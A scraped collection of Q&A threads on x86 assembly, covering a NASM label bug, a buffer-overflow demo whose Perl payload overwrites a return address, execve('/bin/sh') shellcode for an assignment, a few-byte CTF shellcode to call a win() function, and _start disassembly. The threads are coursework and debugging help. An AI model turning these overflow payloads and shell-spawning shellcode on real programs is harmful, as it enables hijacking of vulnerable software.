I have a small example program written in NASM(2.11.08) targeting the macho64 architecture. I'm running OSX 10.10.3:
bits 64
section .data
msg1 db 'Message One', 10, 0
msg1len equ $-msg1
msg2 db 'Message Two', 10, 0
msg2len equ $-msg2
section .text
global _main
extern _printf
_main:
sub rsp, 8 ; align
lea rdi, [rel msg1]
xor rax, rax
call _printf
lea rdi, [rel msg2]
xor rax, rax
call _printf
add rsp, 8
ret
I'm compiling and linking using the following command line:
/usr/local/bin/nasm -f macho64 test2.s
ld -macosx_version_min 10.10.0 -lSystem -o test2 test2.o
When I do an object dump on the test2 executable, this is the relevant snippet(I can post more if I'm wrong!):
0000000000001fb7 <_main>:
1fb7: 48 83 ec 08 sub $0x8,%rsp
1fbb: 48 8d 3d 56 01 00 00 lea 0x156(%rip),%rdi # 2118 <msg2+0xf3>
1fc2: 48 31 c0 xor %rax,%rax
1fc5: e8 14 00 00 00 callq 1fde <_printf$stub>
1fca: 48 8d 3d 54 00 00 00 lea 0x54(%rip),%rdi # 2025 <msg2>
1fd1: 48 31 c0 xor %rax,%rax
1fd4: e8 05 00 00 00 callq 1fde <_printf$stub>
1fd9: 48 83 c4 08 add $0x8,%rsp
1fdd: c3 retq
...
0000000000002018 <msg1>:
0000000000002025 <msg2>:
And, finally, the output:
$ ./test2
Message Two
$
My question is, what happened to msg1?
I'm assuming msg1 isn't printed because 0x14f(%rip) is not the correct address (just nulls).
Why is lea edi, [rel msg2] pointing to the correct address, while lea edi, [rel msg1] is pointing past msg2, into NULLs?
It looks like the 0x14f(%rip) offset is exactly 0x100 beyond where msg1 lies in memory (this is true throughout many tests of this problem).
What am I missing here?
Edit: Whichever message (msg1 or msg2) appears last in the .data section is the only message that gets printed.
IDK about the Mach-o ABI, but if it's the same as the SystemV x86-64 ABI GNU/Linux uses, then I think your problem is that you need to clear eax to tell a varargs function like printf that there are zero FP.
Also, lea rdi, [rel msg1] would be a much better choice. As it stands, your code is only position-independent within the low 32bits of virtual address space, because you're truncating the pointers to 32bits.
It appears NASM has a bug. This same problem came up again: NASM 2 lines of db (initialized data) seemingly not working. There, the OP confirmed that the data was present, but labels were wrong, and is hopefully reporting it upstream.
Related
Short Story
I am writing a simple program in Assembly to simulate buffer overflow. The buffer is simply memory allocation from 512 bytes stack and then read() syscall is called with 4096 bytes from stdin fd.
The buffer overflow is working perfectly when I execute the payload outside GDB. But when I am inside the GDB, the syscall read() returns EFAULT.
In this case, our buffer overflow is supposed to replace return address and make the %rip reach secret_func.
Question
Why in this case buffer overflow does not work inside GDB?
Resources
Code test.S
.section .rodata
str1:
.ascii "Enter the input: "
str2:
.ascii "\nYou find a secret function!\n"
str_end:
.section .text
.global _start
_start:
xorl %ebp, %ebp
andq $-16, %rsp
callq main
_exit:
movl %eax, %edi
movl $60, %eax
syscall
main:
subq $512, %rsp
movl $1, %eax
movl $1, %edi
leaq str1(%rip), %rsi
movl $(str2 - str1), %edx
syscall
xorl %eax, %eax
xorl %edi, %edi
movq %rsp, %rsi
movl $4096, %edx # Intentional to create buffer overflow
syscall
addq $512, %rsp
xorl %eax, %eax
retq
# We reach this function via buffer overflow (replace return address)
secret_func:
movl $1, %eax
movl $1, %edi
leaq str2(%rip), %rsi
movl $(str_end - str2), %edx
syscall
xorl %eax, %eax
jmp _exit
objdump of compiled ELF
Disassembly of section .text:
0000000000401000 <_start>:
401000: 31 ed xor %ebp,%ebp
401002: 48 83 e4 f0 and $0xfffffffffffffff0,%rsp
401006: e8 09 00 00 00 call 401014 <main>
000000000040100b <_exit>:
40100b: 89 c7 mov %eax,%edi
40100d: b8 3c 00 00 00 mov $0x3c,%eax
401012: 0f 05 syscall
0000000000401014 <main>:
401014: 48 81 ec 00 02 00 00 sub $0x200,%rsp
40101b: b8 01 00 00 00 mov $0x1,%eax
401020: bf 01 00 00 00 mov $0x1,%edi
401025: 48 8d 35 d4 0f 00 00 lea 0xfd4(%rip),%rsi # 402000 <str1>
40102c: ba 11 00 00 00 mov $0x11,%edx
401031: 0f 05 syscall
401033: 31 c0 xor %eax,%eax
401035: 31 ff xor %edi,%edi
401037: 48 89 e6 mov %rsp,%rsi
40103a: ba 00 10 00 00 mov $0x1000,%edx
40103f: 0f 05 syscall
401041: 48 81 c4 00 02 00 00 add $0x200,%rsp
401048: 31 c0 xor %eax,%eax
40104a: c3 ret
000000000040104b <secret_func>:
40104b: b8 01 00 00 00 mov $0x1,%eax
401050: bf 01 00 00 00 mov $0x1,%edi
401055: 48 8d 35 b5 0f 00 00 lea 0xfb5(%rip),%rsi # 402011 <str2>
40105c: ba 1d 00 00 00 mov $0x1d,%edx
401061: 0f 05 syscall
401063: 31 c0 xor %eax,%eax
401065: eb a4 jmp 40100b <_exit>
Reproduction Steps
Compile and run without GDB (working fine)
In this case, we calculate the offset of return address and replace it with secret_func address.
ammarfaizi2#integral:/tmp$ gcc -O3 -no-pie -static -nostartfiles -ffreestanding test.S -o test
ammarfaizi2#integral:/tmp$ perl -e 'print "A"x512,"\x4b\x10\x40","\x00"x5' > payload
ammarfaizi2#integral:/tmp$ ./test < payload
Enter the input:
You find a secret function!
ammarfaizi2#integral:/tmp$
Compile and run inside the GDB (read() returns -14 (-EFAULT))
We stepped the read() syscall and found it returns -14. It does not read from stdin at all.
gef➤ b main
Breakpoint 1 at 0x401014
gef➤ r < input
[... GEF output elided ...]
gef➤ si 11
[... GEF output elided ...]
gef➤ x/5i $rip
=> 0x401041 <main+45>: add $0x200,%rsp
0x401048 <main+52>: xor %eax,%eax
0x40104a <main+54>: ret
0x40104b <secret_func>: mov $0x1,%eax
0x401050 <secret_func+5>: mov $0x1,%edi
gef➤ p/d $rax
$2 = -14
gef➤ shell errno 14
EFAULT 14 Bad address
gef➤
GDB and Linux Version
ammarfaizi2#integral:/tmp$ gdb --version
GNU gdb (Ubuntu 10.1-2ubuntu2) 10.1.90.20210411-git
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
ammarfaizi2#integral:/tmp$ uname -r
5.13.0-rc2-fresh-tea-00005-g8ac91e6c6033
ammarfaizi2#integral:/tmp$
For an assignment, I wrote the following assembly code shell_exec.asm that should execute a shell in Linux:
section .data ; declare stuff
arg0 db "/bin/sh",0 ; 1st arg
align 4
argv dd arg0, 0 ; 2nd arg
envp dd 0 ; 3rd arg
section .text
global _start
_start:
mov eax, 0x0b ; execve
mov ebx, arg0 ; 1st arg
mov ecx, argv ; 2nd arg
mov edx, envp ; 3rd arg
int 0x80 ; kernel
I used nasm -f elf32 shell_exec.asm for compilation and ld -m elf_i386 -o shell_exec shell_exec.o for linking. Everything works so far and if I run ./shell_exec the shell spawns the way I want.
Now I wanted to extract the shell code (like \12\34\ab\cd\ef...) from this program. I used objdump -D -z shell_exec to show all parts of the code including the section .data and all zeroes. The output is as follows:
shell_exec: file format elf32-i386
Disassembly of section .text:
08049000 <_start>:
8049000: b8 0b 00 00 00 mov $0xb,%eax
8049005: bb 00 a0 04 08 mov $0x804a000,%ebx
804900a: b9 08 a0 04 08 mov $0x804a008,%ecx
804900f: ba 10 a0 04 08 mov $0x804a010,%edx
8049014: cd 80 int $0x80
Disassembly of section .data:
0804a000 <arg0>:
804a000: 2f das
804a001: 62 69 6e bound %ebp,0x6e(%ecx)
804a004: 2f das
804a005: 73 68 jae 804a06f <__bss_start+0x5b>
804a007: 00 add %al,(%eax)
0804a008 <argv>:
804a008: 00 a0 04 08 00 00 add %ah,0x804(%eax)
804a00e: 00 00 add %al,(%eax)
0804a010 <envp>:
804a010: 00 00 add %al,(%eax)
804a012: 00 00 add %al,(%eax)
If I only have a section .text within my assembly code, I can usually just copy all given values and use them as my shell code. But how is the order in case I have those two sections, namely .data and .text?
Edit 1
So, my second attempt is to do the assembly code like this:
section .text
global _start
_start:
mov ebp, esp
xor eax, eax
push eax ; -4
push "/sh " ; -8
push "/bin" ; -12
xor eax, eax
push eax
lea ebx, [ebp-12]
push ebx ; 1st arg
mov ecx, esp ; 2nd arg
lea edx, [ebp-4] ; 3rd arg
mov eax, 0x0b ; execve
int 0x80 ; kernel
This avoids using multiple sections, but sadly leads to a segmentation fault.
I have the following dump taken from gdb
00000000004006f6 <win>:
4006f6: 55 push rbp
4006f7: 48 89 e5 mov rbp,rsp
4006fa: bf 98 08 40 00 mov edi,0x400898
4006ff: e8 8c fe ff ff call 400590 <system#plt>
400704: 5d pop rbp
400705: c3 ret
Usually this C function is never called however I need to write some shellcode thats less then 10 bytes to run it or get the value displayed. Here is the source of the function;
void win(){
system("/bin/cat ./flag.txt");
}
I'm still a novice at both assembly and C, so any help is appreciated.
In order to run function win() you must do write push <function-win-address> ret in shellcode.
In your case that will be:
\x68\xf6\x06\x40\xc3
\x68 is push
\xf6\x06\x40 is the function address
\xc3 is ret
mov eax, (win addr)
call eax
objdump opcodes after
I am trying to write a shell code program that will call execve and spawn a shell. I am working in a 32 bit virtual machine that was offered for this class. The code is as follows:
section .text
global _start
_start:
;clear out registers
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
;exacve("/bin/sh",Null,NULL)
;ascii for /bin/sh;
;2f 62 9 6e 2f 73 68 3b
push 0x3b68732f
push 0x6e69622f
mov ebx, esp
mov al, 11
int 0x80
;exit(int status)
movv al, 1
xor ebx, ebx
int 0x80
I compile with nasm -f elf -g shell.asm and link with ld -o shell shell.o
When I try to run it, I get a segmentation fault. I tried using gdb to see where I made the mistake, but, it segfaults even if a set a break point at _start+0. It says that there was a segfault at the address after the last instruction for the code.
i.e. if The last line has an address of 0x804807c then the segmentation fault happens at 0x804807e before any of the code has a chance to run.
Could any one point me in the right direction so I can figure out how to fix this?
One mistake in your code is, that there is no 0x3b in ascii code of the string:
;exacve("/bin/sh",Null,NULL)
;ascii for /bin/sh;
;2f 62 9 6e 2f 73 68 3b
push 0x3b68732f
push 0x6e69622f
This following code shall fix this problem (assuming you do work with a little-endian machine):
;exacve("/bin/sh",Null,NULL)
;ascii for /bin/sh;
;2f 62 99 6e 2f 73 68 00
push 0x0068732f
push 0x6e69622f
I'm reading http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html and trying to verify things by hand.
The disassembly of _start is given as follows:
080482e0 <_start>: 80482e0: 31 ed xor %ebp,%ebp
80482e2: 5e pop %esi
80482e3: 89 e1 mov %esp,%ecx
80482e5: 83 e4 f0 and $0xfffffff0,%esp
80482e8: 50 push %eax
80482e9: 54 push %esp
80482ea: 52 push %edx
80482eb: 68 00 84 04 08 push $0x8048400
80482f0: 68 a0 83 04 08 push $0x80483a0
80482f5: 51 push %ecx 80482f6: 56 push %esi
80482f7: 68 94 83 04 08 push $0x8048394
80482fc: e8 c3 ff ff ff call 80482c4 <__libc_start_main#plt>
8048301: f4 hlt
However my own disassembly is as follows:
0x00000000004003c0 <+0>: xor ebp,ebp
0x00000000004003c2 <+2>: mov r9,rdx
0x00000000004003c5 <+5>: pop rsi
0x00000000004003c6 <+6>: mov rdx,rsp
0x00000000004003c9 <+9>: and rsp,0xfffffffffffffff0
0x00000000004003cd <+13>: push rax
0x00000000004003ce <+14>: push rsp
0x00000000004003cf <+15>: mov r8,0x400650
0x00000000004003d6 <+22>: mov rcx,0x4005c0
0x00000000004003dd <+29>: mov rdi,0x40051c
0x00000000004003e4 <+36>: call 0x4003b0 <__libc_start_main#plt>
0x00000000004003e9 <+41>: hlt
0x00000000004003ea <+42>: nop
0x00000000004003eb <+43>: nop
So my question is simply what happened to the arguments for __libc_start_main that are pushed on the stack in the first disassembly?
My file is "ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), not stripped." i.e. dynamically linked as the file in http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html is as well.
Is this because my system is 64-bit and the system used in the link is 32-bit? Has the definition of __libc_start_main changed?